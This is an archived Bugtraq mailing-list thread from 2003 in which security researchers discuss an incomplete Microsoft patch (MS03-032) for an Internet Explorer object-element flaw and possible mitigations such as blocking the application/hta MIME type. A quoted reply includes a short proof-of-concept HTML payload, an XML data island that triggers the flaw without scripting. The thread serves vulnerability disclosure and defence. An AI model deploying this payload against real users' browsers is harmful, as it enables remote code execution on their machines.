Bugtraq mailing list archives
RE: BAD NEWS: Microsoft Security Bulletin MS03-032
From: "Drew Copley" <dcopley () eeye com>
Date: Mon, 8 Sep 2003 14:55:14 -0700
Some AV will catch these because of malware's exploit code which he has reused. Some AV will catch this because of greymagic's exploit code. Which is all fine and good, a bit like a magic trick. Yes, the demonstration exploit is caught... But the worm or trojan exploit someone maliciously sends to your system -- this won't be caught. The only sure way to detect this, I already wrote about [to Bugtraq]. That is by setting a firewall rule which blocks the dangerous mimetype string [Content-Type: application/hta]. Everything else in the exploit can change. But, why merely detect it and risk encoded and other types of AV/IDS/IPS evading techniques? Why not just do this fix? I think, ultimately, it depends on how safe you want to be. Some people do not mind having their systems be at risk. That is their choice.
-----Original Message----- From: ADBecker () chmortgage com [mailto:ADBecker () chmortgage com] Sent: Monday, September 08, 2003 12:17 PM To: GreyMagic Software Cc: Bugtraq; full-disclosure () lists netsys com; http-equiv () excite com; NTBugtraq; Microsoft Security Response Center; vulnwatch () vulnwatch org Subject: RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Updated antivirus software should catch this exploit and prevent any application from being launched. We have McAfee VirusScan 7 Ent. which caught both exploit examples at http://greymagic.com/adv/gm001-ie/ Andrew Becker C.H. Mortgage, D.R. Horton Phoenix IT/MIS Department Phone: (866) 639-7305 Fax: (480) 607-5383 "GreyMagic Software" To: "NTBugtraq" <NTBUGTRAQ () LISTSERV NTBUGTRAQ COM>, "Bugtraq" <security@greymag <bugtraq () securityfocus com>, <full-disclosure () lists netsys com>, ic.com> <vulnwatch () vulnwatch org> cc: <http-equiv () excite com>, "Microsoft Security Response Center" 09/08/03 07:52 AM <secure () microsoft com>, (bcc: Andrew D Becker/Continental Homes) Subject: RE: BAD NEWS: Microsoft Security Bulletin MS03-032The patch for Drew's object data=funky.hta doesn't work:This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which > explains the problem in detail. Microsoft again patches the object element in HTML, but it doesn't patch the dynamic version of that same element.1. Disable Active ScriptingThis actually means that no scripting is needed at all in order to exploit this amazingly critical vulnerability: <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object data=x.asp></object> ]]> </exploit> </security> </xml> Ouch.
Current thread:
- BAD NEWS: Microsoft Security Bulletin MS03-032 http-equiv () excite com (Sep 08)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 GreyMagic Software (Sep 08)
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032 another temporary solution Igor Franchuk (Sep 10)
- <Possible follow-ups>
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 ADBecker (Sep 08)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Drew Copley (Sep 08)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Nathan Wallwork (Sep 10)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Drew Copley (Sep 10)
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032 Crist J. Clark (Sep 12)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Drew Copley (Sep 08)
- Re: [Full-Disclosure] RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Nick FitzGerald (Sep 09)